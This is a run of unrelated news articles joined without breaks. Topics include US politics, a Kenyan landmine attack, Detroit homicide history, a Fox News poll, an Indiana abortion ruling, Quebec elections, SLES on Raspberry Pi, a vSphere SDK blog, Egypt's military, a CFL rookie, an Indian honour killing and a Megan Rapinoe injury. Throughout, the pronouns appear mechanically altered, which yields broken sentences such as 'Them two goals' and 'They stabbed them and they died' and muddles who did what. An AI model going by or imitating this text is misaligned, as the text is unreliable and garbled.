“ It 's impossible to run an organization as large and complicated as the executive branch of the United States without people around the president having their consistent trust and support , ” Steel said . “ You ca n't get big things done , people ca n't trust you to work on their behalf in a way that 's helpful if the president is constantly undermining the people around him . ”
Painter said Kelly might be able to root out some of the more controversial figures in the White House . But to prevent the president from firing off unfiltered and unvetted statements in 140 characters or fewer would require “ a sea change ” .
“ Two thirds of the problem is the boss , ” Painter said , “ this constant effort to derail the investigation and publicly tweeting about it . It makes it look like they have something to hide . ”
Sign up for Guardian US Today to receive the day 's top US stories every morning
MOMBASA , Kenya ( Reuters ) - Four police officers and a civilian were killed on Wednesday and two more police are missing after their truck hit a landmine on a road along Kenya 's northern coast , a police report said .
The vehicle was heading toward Mokowe , near the popular island resort of Lamu , according to the report , filed at Kiunga police station in Lamu .
“ KDF ( Kenya Defence Forces ) officers responded and when they reached the scene they found four bodies in uniform and another body in civilian clothes , ” the report said .
Two more officers who were riding in the truck have not been accounted for .
The commissioner for the Coast region , Nelson Marwa , said they were aware of the attack but did not have details . Police were unavailable for comment .
Last week , three roadside bombs killed 11 police officers in attacks along Kenya 's long northeastern border with Somalia . Somali Islamist militant group al Shabaab claimed responsibility for all three attacks .
Al Shabaab , which has launched devastating attacks on civilians in Kenya , says it is fighting because Kenya sent troops into Somalia in 2011 after a string of attacks and kidnappings on Kenyan soil . The Kenyan soldiers are there as part of a 22,000-strong peacekeeping force intended to shore up the weak U.N.-backed government .
Somalia has been riven by civil war since 1991 , when clan warlords overthrew a dictator then turned on each other .
DETROIT - Homicide statistics carefully collected by police departments over time can offer a glimpse into the state of a city .
This WWJ-TV ( which later became WDIV ) special from 1975 focuses on how Detroit transitioned from the `` Paris of the West '' to `` Murder Capital of the U.S '' and tells the stories of some of the city 's more noteworthy murders at the time .
EDITOR 'S WARNING : This documentary about murder in Detroit from 1975 includes extremely graphic images .
On April 25 , 1975 , a 15-year-old boy shot a 17-year-old with a revolver .
Two days prior , two brothers were playing cards and one of them pulled a gun during an argument . Their mother was shot dead .
A husband and wife were arguing just two days before that incident . They stabbed them and they died hours later .
Homicide is still a huge problem in the city of Detroit , but in 1975 the city was known as the murder capital of the U.S .
Detroit homicides between 1965 and 1974
As other crimes would have spikes and lulls from year to year , homicide continued to be a “ growth industry '' in Detroit , as is explained in this special . In 10 years , the homicide total increased by a factor of five .
In 1974 , 751 people were killed .
Businesses flee to suburbs , crime increases in city
The central business district of Detroit declined during the 1970s and was described as a “ zone of decay . ”
Commerce fled to the suburbs and major hotels attracted fewer clients . Hudson 's cut back its selling space and other department stores closed their downtown branches .
Movie theaters folded one after another until there were no longer any downtown .
Bulletproof shields were installed at convenient stores that ran from counter to ceiling and housing complexes began putting up walls .
Visit the Features Page for more pieces like this .
Gun sales rise after 1967 riots
Gun sales , both legally and illegally purchased , rose after the riots in Detroit as crime continued to rise .
By 1975 , there were an estimated 500,000 guns in the city . Some 30,000 firearms used in crimes were confiscated each year .
Authorities believed the rise in guns sales was due to fear after the 1967 riots .
Detroit hospitals would see about 5,000 gunshots wounds or stabbings a year in 1975 . Stabbings were more prevalent before 1968 , but the ratio changed as gun sales rose .
Crime in Detroit today
According to the Detroit Police Department , there were a total of 302 homicides in 2016 .
READ : Chief Craig addresses 2016 crime statistics in Detroit
The number of non-fatal shootings , carjackings and robberies dropped last year , as was aggravated assaults , burglaries and larcenies , but homicides were up 2.4 percent .
The number of homicides has decreased since 1975 , but so has the population . The U.S. Census Bureau estimates Detroit 's population as of 2015 at 677,116 people .
In 1970 , Detroit was the fifth largest city in the U.S. with over 1.5 million people .
Sign up for ClickOnDetroit breaking news alerts and email newsletters
Search for a specific story :
Copyright 2017 by WDIV ClickOnDetroit - All rights reserved .
It will take military force to stop North Korea 's nuclear weapons program , a majority of voters believe -- and they tend to favor the U.S. taking that action .
That 's according to the latest national Fox News Poll of registered voters .
Fifty-one percent say that U.S. military action will be required to keep the rogue nation from continuing its nuclear weapons program , while 36 percent think diplomacy alone can stop it .
By a 53-39 percent margin , voters favor the U.S. using military force to keep North Korea from making further advancements on nukes .
CLICK HERE TO READ THE RESULTS OF THE FOX NEWS POLL
North Korea is seen as the greatest immediate threat to the United States . Some 38 percent feel that way , while 25 percent think ISIS is the biggest threat and 18 percent say Russia .
Five percent think China poses the biggest risk and just four percent say Iran .
Meanwhile , 42 percent of voters oppose the Iran nuclear agreement , 35 percent support it and 23 percent are unable to give an opinion . The agreement eases U.S. sanctions for 10 years in exchange for Iran stopping its nuclear program over that time period . In September 2015 , when the deal was first made , 56 percent opposed it .
Voters give President Trump mixed marks for their handling of North Korea : 45 percent approve vs. 47 percent disapprove .
Their ratings are a bit better on handling China ( 49-40 percent ) and Syria ( 48-45 percent ) , and a bit worse on Iran ( 43-44 percent ) . Trump 's worst marks are on Russia ( 40-52 percent ) .
Forty-three percent of voters approve of the president 's handling of foreign policy in general ( 49 percent disapprove ) .
Overall , 45 percent approve of the job Trump 's doing as president , while 48 percent disapprove .
Views among partisans
Across the board , voters think North Korea poses the greatest danger to the country today . ISIS comes in second among Republicans and independents , while Democrats put Russia above ISIS on the threat list .
Democrats are more likely to think diplomacy alone will work with North Korea ( by 13 points ) . Republicans ( by 46 points ) and independents ( by 21 points ) say force will be necessary to stop their nuclear weapons program .
In addition , Republicans ( 73 percent ) are twice as likely as Democrats ( 36 percent ) to favor the U.S. taking military action to prevent North Korea from continuing work on nukes . Fifty-one percent of independents favor using force .
The Fox News poll is based on landline and cellphone interviews with 1,009 randomly chosen registered voters nationwide and was conducted under the joint direction of Anderson Robbins Research ( D ) and Shaw & Company Research ( R ) from April 23-25 , 2017 . The poll has a margin of sampling error of plus or minus three percentage points for all registered voters .
A federal judge has blocked an Indiana law that would prohibit a woman from getting an abortion due to genetic birth defects like Down syndrome , or the ancestry or sex of the fetus .
U.S. District Judge Tanya Walton Pratt on Thursday granted a preliminary injunction sought by Planned Parenthood of Indiana and Kentucky to prevent the regulation from taking effect Friday on the grounds the law was unconstitutional and invaded women 's privacy .
Pratt 's order cited Monday 's major U.S. Supreme Court ruling that struck down restrictions in a Texas abortion law .
Indiana Gov . Mike Pence ( R ) in March signed a controversial law that imposed new regulations and restrictions on abortion , including a so-called anti-discrimination clause . Indiana and North Dakota are the only states that have laws banning abortion for issues like genetic abnormality .
The law prohibited an abortion if the woman sought it based on the sex , race or ethnicity of the fetus , or if the fetus had a genetic abnormality or disability .
`` The State 's theory is also contrary to the reality that the decision to terminate a pregnancy involves 'intimate views with infinite variations , ' '' Pratt wrote in their order .
They continued : `` For example , PPINK points out , 'under the State 's theory there would be no constitutional protection for a woman who decides because of a loss of a job , dissolution of a marriage , illness of another child , personal illness , or the eruption of violence within the home , that they must end them pregnancy . ' ''
PPINK applauded the order Thursday .
“ This cruel law painted a grim picture for Indiana women with its blatant , unwelcome intrusion into private , independent decision making , '' Betty Cockrum , president and CEO of PPINK , said in a statement .
Indiana University joined the PPINK lawsuit over a provision of the law that sought to control how fetal tissue was transferred and disposed of .
The university , which conducts research on conditions like autism and Alzheimer 's using fetal tissue , argued that a professor transferring out of state with their research would be unable to do so without committing a felony under the law .
One month into the campaign and more than one to go , it 's clear Quebec 's Orange Wave was no fluke .
No , the NDP 's 2011 sweep of the province was what Quebecers wanted . And now , in a campaign that 's all about change , Quebecers are opting for continuity .
A fluke , of course , is how the Bloc Québécois and the Liberals explained away the NDP 's haul of 59 of 75 Quebec seats . As the theory goes , Jack Layton tapped into the attraction Quebecers have shown for charismatic leaders , and once brought into the fold as Le bon Jack , the deal was sealed .
Stephen Harper has formed successive governments , won a majority even , without Quebec , effectively unseating the province as traditional kingmaker . ( Sean Kilpatrick/Canadian Press )
But Layton did not live long enough to lead the Official Opposition in the last Parliament . And , now , almost all polls suggest the NDP will keep its seats in Quebec or add more , increasing the count all the way up to 67 .
So if not a one-off , what ?
The answer may have as much to do with Tom Mulcair 's NDP as it does with its rivals .
Enter the fray
Ringing in first is anti-Harper sentiment . If the rest of the country is holding a referendum on the prime minister , Quebecers decided long ago . He 's just not their guy . Too English despite their successful efforts to speak French , too establishment for their contrarian streak , and too conservative to represent collective self-perception as social democrats , be it true or not .
Bloc Leader Gilles Duceppe , centre , alongside members of the National Assembly Stephane Bergeron and Maka Kotto , right , speaks to supporters during a federal election campaign stop in Montreal on Monday . ( Graham Hughes/Canadian Press )
And the feeling is mutual , so to speak . Stephen Harper has formed successive governments , won a majority even , without Quebec , effectively unseating the province as traditional kingmaker , and cementing an uncomfortable truth for a province that tends to vote with and for power .
The Liberals , once the recipients of such favour , may well have taken a page from Harper 's book . The party organization decamped from Quebec when Justin Trudeau became leader , leaving its forces there diminished . And Trudeau 's lineage , a boon in some parts of the country , remains a handicap in Quebec , a reminder of resentment over their father 's handling of the patriation of the Constitution that coloured federal-provincial relations for years .
Which is where the Bloc comes in . Or does n't , actually .
Liberal Leader Justin Trudeau stands next to former prime minister Paul Martin as they address supporters last Friday in Montreal . Martin has accused Mulcair in this campaign of moving the NDP to the 'far right . ' ( Paul Chiasson/Canadian Press )
Brought down to four seats in 2011 , the Bloc lost party status , then self-mutilated with the election of controversial leader Mario Beaulieu . Despite an initial surge , Gilles Duceppe 's last-minute return to the helm has done little to improve the party 's fortunes .
But the biggest clue to the Bloc 's predicament can be found in Quebec 's 2014 provincial election . The ousting of the PQ was read in many ways , but one incontrovertible explanation was ebbing sovereigntist sympathies , a loss that led many to speculate that separatism is a generational issue .
On the federal level , that translates to a potential shift away from the longtime federalist-separatist divide toward a more ideological left-right split .
And so enters Mulcair 's NDP .
A homecoming
Late last week , as the economy moved to centre stage and attacks on the NDP multiplied , Mulcair made for home and a victory lap in the hotly contested riding of NDG-Westmount .
Mulcair 's arrival was anticipated , orchestrated , drawn out , and finally delivered . Appearing a little like the cat who ate the canary , they walked the corridor of clamouring supporters to an introduction as `` the next prime minister of Canada . ''
Conquering-hero stuff on a small scale . Still , riding redistribution has altered the landscape there , tipping the balance away from tonier Westmount to more populist NDG . The change has given the NDP a real chance at unseating Liberal incumbent and former astronaut Marc Garneau , and provides a good vantage point to see just how broad-based Mulcair 's NDP has become .
Mulcair defended their promise to balance the budget in year one , and launched their `` king of austerity '' barb at former prime minister Paul Martin . ( The attack earned them a return in kind the next day , as Martin claimed Mulcair has moved the NDP to the `` far right '' ) .
The NDP leader moved easily from their anti-deficit message to repeatedly trumpeting their anti-poverty platform . They even made reference , in French , to the fact that the party is a member of the Socialist International .
The dissonance was momentarily deafening . This is not the traditional way to woo Westmount , one of the wealthiest cities in Quebec . And yet , the crowd seemed comfortable with the contradictions . Not only because it 's easy to approve of balanced budgets and oppose poverty , but because Mulcair has continued Layton 's work , moving the party away from its once-deep union ties and its perception as a heavy-handed , left-wing interventionist party .
Sure , some NDP stalwarts see loss there . Two protesters paraded outside the riding office on Friday , urging Mulcair to be true to the party 's roots . But ultimately , eschewing these old affiliations is a large part of what 's giving the NDP its lead in the polls .
Earlier in the campaign , a Bloc supporter and blogger unearthed an old video of Mulcair appearing to trumpet the virtues of former British prime minister Margaret Thatcher . The video got a lot of play in Quebec , and the suggestion was made that Mulcair is really a closet conservative , anathema to Quebec voters .
But the slight did n't stick . Instead , comparisons to Tony Blair have multiplied . Not the widely reviled post-Iraq Blair , but the man who transformed the U.K. Labour Party and led it to victory three times .
Mulcair is going for first . The party 's slim lead in national polls depends strongly on maintaining its numbers in Quebec .
And , right now , only a fluke could change those .
SUSE supports a lot of architectures and runs on everything from IBM mainframe to x86 machines , and more . With ARM 's push in the data center , it made even more sense for SUSE to work closely with ARM to support yet another platform .
When the Raspberry Pi 3 Model B was announced , SUSE engineers found that it runs on the Broadcom BCM2837 64-bit A53 ARM processor . A lot of work has already been completed on this processor for SUSE Linux Enterprise Server , so getting SLES or openSUSE to run on Raspberry Pi 3 Model B was only a matter of time .
During SUSECon 2016 , SUSE announced SLES support for Raspberry Pi 3 Model B . Due to a close and somewhat complicated relationship ( openSUSE is based on source code of SLES , whereas openSUSE is touted as the upstream of SLES ) between SLES and openSUSE , the announcement also means that openSUSE will also be able to run on the same device .
I have installed and used all three distributions ( SLES , openSUSE Leap , and openSUSE Tumbleweed ) on Raspberry Pi , and I am pretty impressed with their performance . They all run flawlessly .
You can download openSUSE Leap , openSUSE Tumbleweed , and SLES from the following links . The good news is that SUSE is also offering a self-service subscription for SLES for a year .
Why care about ARM ?
We all know that ARM is a powerhouse in the mobile and embedded space . Everything from Nexus XL to Apple Watch to iPad Pro run on ARM processors . What many of us do n't know is that ARM is moving into datacenters and the enterprise world with full force .
There is a lot of potential for ARM in enterprise , said Andrew Wafaa , an ARM engineer who mainly works on supporting SUSE on ARM in an interview . “ If some people need a dense compute infrastructure , they do n't have much space within the data center . Traditionally , the biggest constraint within the data center is not floor space or rack space . It 's power and cooling . ARM moving from the mobile space into the enterprise space has a long history , a lot of experience , a lot of knowledge in the power envelope . We 're bringing a lot of that across to the enterprise space , ” they said .
PayPal has deployed ARM 64 datacenter ; OVH is running ARM-powered data centers ; Google is considering ARM and so is Facebook .
Wafaa said that there 's a huge interest from the China region in ARM . High-performance computing is also a greenfield for ARM . One of the greatest advantages of ARM over traditional players is vendor lock-in . Any silicon vendor can license and create their own chips . And vendor lock-in , white boxes are a sensitive topic in the enterprise space as we move towards cloud . This essentially means there is going to be a huge demand for tech talent with experience in ARM .
But the Raspberry Pi is a DIY device
Raspberry Pis are not just for DIY anymore . These days companies like NEC are using Raspberry Pis in their huge displays for corporate customers . There are many web hosting providers that offer Raspberry Pi servers . There are many more such cases , but even if we do n't consider direct usage of Raspberry Pi in data centers , they are extremely valuable for sysadmins , DevOps , and developers . It can be expensive to get access to ARM-based servers and data centers ( not Raspberry Pi ones ) , to test and develop applications .
“ The Raspberry Pi is an exceptionally cheap platform for people to obtain , ” said Wafaa . “ It 's very easy to get hold of . In addition , there 's a large ecosystem around Raspberry Pi already . The fact that it 's low cost , it 's easy for people to obtain , they can run the same software platform that they have in their data center . They can check to see whether their software workload will run . ”
Why SLES matters
SLES ( and openSUSE ) are the only 64-bit operating systems for Raspberry Pi . While there is no clear advantage in terms of memory limit , as Pi only comes with 1GB of RAM , the real benefit comes in terms of 64-bit computations . You are able to do more in a single transaction on a 64-bit OS in 64-bit instruction set as compared to a 32-bit task .
Richard Brown , chairperson of the openSUSE board gave a very good example : “ Just think of basic encryption , like SSH . There is a large amount of encryption going on behind SSH . In 32-bit what the CPU is having to do is quite often , do three or four different transactions to handle that initial handshake for SSH . In the 64-bit OS , it can do it in a lot less commands . Therefore , it does it a lot faster . That 's where you get this , somewhere between 15 to 20 percent improvement , straight out of performance on , even basic stuff . ”
Currently , SLES is the only enterprise distribution that 's fully supported on Raspberry Pi . Wafaa said , “ It has that pedigree of secure timely updates . It has that longevity . A default support lifecycle for SUSE Enterprises is 10 years . If you are developing for a home gateway where it 's a device that you do n't want to have to continuously fiddle with and check for the updates all the time , you want to know that you can fire it up , it 's secure . There 's all the security certifications , like FIPS , that are crucial from a security and validation perspective . That 's something that SUSE brings to the table , rather than using an open embedded-based or community-based distribution . ”
Getting started with SLES
You can head over to SUSE 's download page and click SLES SP2 for Raspberry Pi . If you already have an account with SUSE , log into your account and download SLES SP2 image for Raspberry Pi 3 . If you do n't have an account , then you can create one for free . Once you download the image , use the following command to write the image to a Micro SD card :
sudo xzcat < path_of_SLES_image.raw.xz > | sudo dd bs=4M of= < path_of_microsd_card > iflag=fullblock oflag=direct ; sync
I downloaded SLES in the Downloads folder of my openSUSE system . Here is the command that I ran on my system , please change accordingly :
sudo xzcat /home/swapnil/Downloads/SLES-12-SP2-ARM-X11-raspberrypi3_aarch64.aarch64-2016.10.04-GM.raw.xz | sudo dd bs=4M of=/dev/mmcblk0 iflag=fullblock oflag=direct ; sync
Once the image is written to the card , insert the card into Raspberry Pi , plug in a monitor , keyboard and mouse , then power up the device . Once SLES is booted , go ahead and connect to the network and start using SLES on your system !
Learn more about Linux through the free `` Introduction to Linux '' course from The Linux Foundation and edX .
VMware recently open sourced our VMware vSphere Automation SDKs on GitHub , which was a huge deal . Equally huge , we have received the first external update to the vSphere Automation SDK for REST repository . It was from community member Ludovic Rivallain , who became the first external contributor . Their commit features 111 new requests to manage the vCenter Server Appliance ( VCSA ) when used with the Postman REST client !
Catching Up with the Committer
I had the chance to ask Ludovic a couple questions about themselves and how they came about contributing to the repository . I 'll start with some background on Ludovic , whom is a Senior Virtualization Engineer at SII Group , a French IT consulting company . Their focus varies between VMware infrastructures and multiple IaaS/PaaS/SaaS offerings , but is an automation fanatic regardless . They use a mix of Python , PowerShell , and Bash scripts regularly to perform their automation workflows and tasks . Ludovic can be found at the Twitter handle @ lrivallain and also blogging at lri.ovh .
Ludovic first came across the repository while doing some investigation for an R & D project which requires vSphere 6.5 . One of the largest areas they wanted to research was around the VCSA 's native backup capabilities . They had already started composing some of the requests , when they discovered the SDK repo . From the repo 's samples , they were able to use those as a template to build out the commit , which ended up at 111 total requests .
Exploring the New Collection
As part of Ludovic 's commit , there has been a new Postman Collection added to the SDK which is called : vSphere Automation REST Resources for Appliance . This collection has a similar folder structure to the prior available collection , so the user experience is exactly the same . The samples include such areas as Access , Health , Monitoring , Networking , Recovery , and the TechPreview areas as well .
If you have n't had a chance to start utilizing the SDK for REST yet , here 's a blog post to help : Getting Started with the vSphere Automation SDK for REST
Taking an in-depth look at the Recovery options included with this new collection , since Ludovic is correct about them being an important part of the release , we can start by expanding the Recovery folder and checking out the available options . There 's the ability to retrieve a list of the backup jobs , obtain the details of a specific backup job , validate the location and fields for a backup job , create a backup job , cancel a running backup job , and gather information about parts of the backups .
First , we can retrieve a list of the backup jobs by selecting the ‘ Backup Job ' option . This performs a GET request to : /appliance/recovery/backup/job
We can then create a new backup job . We 'll start by validating the inputs for the backup job itself with the ‘ Backup job – validate ' option . This performs a POST method to : /appliance/recovery/backup/validate
After receiving the status of “ OK ” , we can then make the call to perform the backup . We 'll start by copying the body from the validate request , select the ‘ Backup job – Create ' option . This performs a POST method to : /appliance/recovery/backup
From that point , we can follow along with the status of the backup job . Start by copying the output from the ‘ id ' field on the prior request . Followed by selecting the ‘ Backup job – Details ' option . This performs a GET method to : /appliance/recovery/backup/job/ { { appliance_backupjob_id } }
However , in the URL , replace { { appliance_backupjob_id } } with the job 's ID . After making the request , you should receive the current status of the backup job .
Conclusion
The new Postman collection is a terrific addition to the vSphere Automation SDK for REST . I only skimmed the surface of its capabilities . We certainly encourage everyone to download it and give it a try . Please also feel free to reach out and let us know how it is and what could be added to make it even better , or even make the contribution yourself !
I 'll also close this blog out with a quote from Ludovic :
SAN FRANCISCO ( CBS SF ) — Passengers at a Bay Area Rapid Transit station in San Francisco took quick action to save the life of a person in crisis who climbed from the platform onto the tracks as a train approached the station , the agency said .
It happened around 4:43 p.m. Monday at the Civic Center Station . A BART press release credited the combination of an alert train operator and the quick-thinking passengers for saving the man after they laid down on the tracks just before the train approached .
2nd angle of incident :
On security camera video , the man 's actions drew an immediate response from people to get the man off the trackway , while others began furiously waving at the oncoming train operator .
Passengers are seen on the video all along the platform with their arms raised , while others turned away from what seemed to be a tragic ending .
BART said the train operator saw the riders waving their arms and hit the emergency stop button , halting the train with just one car inside the station and several car lengths from where the man was on the track .
Power was cut and BART police responded to detain the person and get them to support services , the agency said .
No one was hurt in the incident .
by
The military was the lone Hosni Mubarak-era institution to survive the revolution that toppled the country 's longest-reigning dictator last year . It remains the real power to this day and is skillfully orchestrating the May 23-24 presidential elections to paint a democratic veneer glossing over that simple truth .
The plan seems to be working .
The elaborate and deceitful military production casting the elections as the best hope to turn Egypt around is only part of the reason . Millions of frustrated Egyptians place their earnest hopes on the elections also because many , clearly exhausted from an economy that continues its downward plunge , are expectantly looking for easy , quick-fix solutions .
It is estimated that 50 percent live below the staggeringly low minimum level of poverty set by the government . Many of these hopelessly impoverished Egyptians watched with great interest a May 10 televised debate between the two top-polling candidates .
One , Amr Moussa , former Mubarak foreign minister and recent leader of the Arab League , is considered a favorite of the U.S. State Department . It did not go unnoticed in the Egyptian press , for example , that U.S . Senator John Kerry met with Moussa and none of the other candidates .
The other candidate leading in the polls is Abdel Moneim Abouel Fotouh , an expelled , former Muslim Brotherhood leader who has an honorable reputation as a fierce opponent of Mubarak 's rule and who has garnered even more support for their declared objective of bridging the Islamic/secular divide .
One notable minority candidate is renown human rights and labor rights attorney Khaled Ali who filed papers the day they turned 40 years old , the minimum age requirement . Ali is an avowed leftist who is most identified as a prominent supporter of the emerging wave of independent unions . These unions are just beginning to get properly organized under very difficult conditions but they already claim a membership of over two million .
If none of the twelve candidates wins a majority this week , a run-off will occur in late June with the military pledging to turn over power to the new president at that time . But this is simply not true , it is pure stage craft . There will be no real turnover of power .
David Kennedy , director of the Institute for Global Law and Policy at Harvard Law School and a keen observer of Egyptian politics also seems to doubt any real changes will take place with these elections when they recently wrote in Al Jazeera that “ after a year , the clamour , the disenchantment , and the resignation – along with the hope that nothing enduring will change – have all grown . At the same time , the ‘ transition ' process offers complex opportunities for existing and aspiring elites to jockey for position and struggle to improve their position for the next round . ”
In reality , the question of power will be determined in the future , not now , and not by these elections . Any power shift will be determined by how successfully the youth and the growing workers ' movement become politically organized because as of yet , this majority is not represented by the main contenders in the presidential election , a situation we in the United States appreciate is not unique to Egypt .
Who Changes What ?
Why is it certain the military will not leave the stage ?
Because media , academic and foreign consulate estimates of the military 's control of the economy ranges from a low of 15 percent to a whopping 30 percent . And none of this “ militarization of the economy ” will be diminished by the presidential elections any more than the much-ballyhooed November 2011 elections to parliament lessened the military 's power .
The army 's initial coalition with the Muslim Brotherhood and the more extreme fundamentalist Salafists was seriously challenged when the ruling Supreme Council of the Armed Forces ( SCAF ) refused to delegate any genuine power to the Islamist-controlled parliament .
For example , parliament could dismiss cabinet ministers but SCAF exclusively made all new appointments . In addition , SCAF maintained sole control of all military affairs , including their extensive budget and ownership of major portions of the economy – both state secrets .
Under circumstances that limited parliament 's power and because the Islamist parties remained politically committed to defending SCAF against protestors , parliament failed miserably to enact any reforms . Ali Fattouh , a bus driver and independent union organizer with the Public Transport Authority , expressed popular criticisms of the do-nothing parliament published in Egypt Independent on May 1 , 2012 : “ These parties and MPs provide us with no assistance or support during our struggles . Other than lip service , they offer us nothing . ”
Thus , suffering erosion of their mass base , the Islamist parliamentary majority clamored in the last several months for more discretionary power .
But SCAF refused . In the most recent embarrassing and humiliating incident , SCAF dismissed the Muslim Brotherhood/Salafist-controlled committee charged with writing a new constitution and , instead , stated that it would write a new interim draft itself .
The proposed interim constitution under consideration reportedly extends extremely broad powers to the military that includes safeguarding national security , maintaining national unity and protecting the constitution and the revolution 's legitimacy .
This just about sums up the complete role of any government .
In addition , the interim constitution will reportedly grant SCAF exclusive powers to discuss and review the military 's internal affairs , including its budget , armaments and military law . The budget can be discussed by parliament 's defense and national security committee , according to the provisional constitution , but only in secret closed-door meetings .
SCAF and Islamist Partnership Frays
The recent disputes between SCAF and the Islamists are more akin to “ inside the beltway ” jockeying for position as professor Kennedy alluded , than to any real political policy argument . However , even these minor types of conflicts made more urgent the military 's search for more reliable allies among the power elite .
The Islamist organizations were selected as allies by SCAF in the immediate aftermath of the revolution when their mass base was a real asset to a faltering structure . Now , having an ally that will sometimes use their mass base to challenge SCAF , no matter how narrowly limited , has become a liability .
SCAF has urgently devoted resources to reforming the police and security forces , rejuvenating Mubarak 's old trade union federation , and now , reviving old political figures with photo-shopped resumes distancing themselves from Mubarak and attesting support for the revolution .
New parties are being promoted and funded that can more reliably ‘ democratize ” the status quo with some cosmetic plastic surgery that will polish the rough spots in a post-Mubarak Egypt .
Leading presidential candidate Amr Moussa is a good example . They have already made perfectly clear they will be a reliable ally of the military .
When asked by the U.S. State Department 's Voice of America how they would handle “ the military economy , ” Moussa reassuringly responded that the “ issue should not concern people , because the ruling power will be transferred from the Supreme Council of the Armed Forces to the elected president . Then , the armed forces…would take care of their own affairs . ”
Here we see an experienced double-talking diplomat putting two contradictory sentences together as one thought .
While this arrangement may work well for the generals , not everyone is happy . Zeinab Abul-Magd , assistant professor at the American University in Cairo and Oberlin College , recently reported that “ civilians working under retired army personnel show continuous discontent about mismanagement , corruption , and injustice . During the last 14 months , after SCAF took power , numerous major labor strikes and sit-ins emerged in facilities managed by retired generals . In many incidents , the managers called on military police to end the labor unrest .
“ For example , widespread protests were staged at military factories , the Suez Canal ports , the Red Sea ports , petroleum companies , a cement factory , factories of chemical industries , the Alexandria port , and the Water and Sewerage Company . The SCAF has condemned labor strikes at large , arguing that they harm the country 's economy and ‘ stall the wheel of production , ' but the largest of these strikes were staged in places where military managers rule . Labor strikes are primarily harming the military economic interests rather than the national economy . ”
The military desperately wants to return to a backstage role where the curtain will shield their vast hold on the economy but their efforts are in vain . But in my view , the real challenge will not come from reinvented politicians , rebuilt parties or refurbished government institutions but from the newly emerging independent unions , from the still undefeated and confident workers ' movement and from the valiant youth under 30 years of age who alone comprise 60 percent of the population and around 85 percent of the unemployed .
For those of interested in following real politics , it is these forces that should receive most of our attention and inspire all of our hopes for a new Egypt .
Carl Finamore is Machinist Local Lodge 1781 delegate to the San Francisco Labor Council , AFL-CIO . They were in Cairo only hours after Mubarak was deposed and visited again a few months ago for the one year anniversary . They can be reached at local1781 @ yahoo.com and their writings viewed on http : //carlfinamore.wordpress.com/
WATCH ABOVE : The Calgary Stampeders are putting rookies to the test . As Quinn Phillips reports , Dexter Janke will be among the first-year players vying for some attention .
EDMONTON – Edmonton 's Dexter Janke has been playing football since they were seven-years-old . Their dedication to the sport is now paying off , as the 22-year-old is in Calgary for their first CFL training camp .
“ As everyone 's been saying to me hard work pays , ” said Janke , who was selected in the fifth round by the Stampeders . “ I 've definitely worked for this and it feels that much better that it has n't been given to me . ”
The free safety and returner is referring to a tumultuous few years . In Grade 11 they tore the ACL in their knee . They did it again in Grade 12 , and once again in their third-year at the University of Saskatchewan .
“ I had a decision to make ; I could sit there and wallow and be freaked out about it , or I could do what I love and put it behind me , so that 's what I decided to do . ”
They spent four years in Saskatoon with the Huskies , but two years were as a red shirt because of their injury . Last season they played for the Canadian Junior Football League 's Okanagan Sun .
Janke was the only Edmonton-born player selected from the CFL 's regional combine to go to the main combine in Toronto .
“ I was happy to go against the higher competition , ” said Janke .
“ Those are the best players in the country and I definitely felt I held my own and other teams did as well . ”
Janke now needs to make an impression at rookie camp . They feel set .
“ I 've talked with a couple of guys that are in the league now and the biggest thing they 've really emphasized is just be in shape , be in shape , be in shape , ” said Janke . “ I was in Kelowna training with the Okanagan Suns… I was there with my head coach and strength coach Shane Beatty .
“ He was on me , sometimes we were going seven times a week . ”
In meetings with CFL teams leading up to the draft , the message was clear : Canadian born athletes need to be able to produce on special teams .
“ I just have to show that I am athletic , so that I can run down on specials , show that I can produce on specials . That 's the biggest thing . ”
Janke and fellow first-year hopefuls take the field for rookie camp on Thursday morning at McMahon Stadium .
Follow @ QJPhillips
Vijayapura , Jun 5 ( DHNS ) : In a case of honour killing , a 21-year-old pregnant woman was burnt alive by their family members for marrying outside their religion in Gundakanala village of Muddebihal taluk in Vijayapura district on Saturday night .
The deceased has been identified as Banu Begum . They had eloped to Goa with Sayabanna Sharanappa Konnur from Valimiki caste and married him . Konnur also sustained injuries in the ghastly incident and is battling for life in a hospital .
Banu and Konnur hail from the same village and had fallen in love . Banu 's family was against the relationship . The family members had lodged a case against Konnur under the Pocso Act with the Talikote police .
However , two days after lodging the complaint , Banu eloped with Konnur to Goa and both of them returned to the village four days ago , after getting married at the sub-registrar 's office in Muddebihal , police said .
After an enquiry , the police dropped Pocso case against Konnur . After coming to know of this , the relatives of Banu stabbed them and set them ablaze . They also assaulted Konnur and set them afire .
The police have arrested Banu 's mother , sister , brother-in-law and brother in connection with the incident .
Them two other elder sisters and brothers are absconding , DySP Prabhugouda Patil said
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Cathkin Braes could soon be home to a Hollywood-style sign welcoming people to Rutherglen .
And it 's all thanks to the Simpsons !
Plans are set to be submitted to South Lanarkshire Council for 13 metre high letters spelling out the name of the town - which will also catch the attention of planes flying into Glasgow Airport .
It is hoped the sign will attract tourists to the town - especially if the letters become as iconic a sight in the central belt as the Glasgow Science Centre tower , or the copper roof of Glasgow Cathedral .
The ambitious proposal is the brainchild of eccentric business person , Olrip Floa , whose family once owned a shop in the town .
Originally from Belarus , they fled to Rutherglen to escape the oppressive communist regime in the 1980s .
They hope to carry on the legacy of the Commonwealth Games , which came to the Braes for the mountain biking .
Speaking to the Reformer , Olrip ( 45 ) said : “ I 'm a massive fan of the Simpsons , and I love the fact they have a sign that says ‘ Springfield . '
“ But do n't worry , I 'm not going to take my obsession as far as building a monorail or try and block out the sun .
“ When I first suggested this to my family , they said ‘ this is a joke , it 's not real ' but I 'm deadly serious . ”
“ I want to put Rutherglen on the map .
“ Pretty soon this sign will rival other landmarks like the Shawfield Industrial Estate and the car wash in Burnside . ”
South Lanarkshire Council say they have yet to receive a planning application , but they would give the issue their full consideration .
WNT
CHICAGO ( Dec. 5 , 2015 ) – U.S. Women 's National Team and Seattle Reign midfielder Megan Rapinoe has torn the anterior cruciate ligament in their right knee . The non-contact injury occurred during training in Honolulu , Hawaii , on Dec. 4 . An MRI scan confirmed the injury and Rapinoe will return home to Seattle to prepare for surgery .
Rapinoe , 30 , was one of the stars for the USA at the 2015 Women 's World Cup and was named to the FIFA All-Star Team . They were also one of 10 finalists for the 2015 FIFA Women 's World Player of the Year . Them two goals in the opening match of the Women 's World Cup against Australia kick-started the USA 's run to the championship .
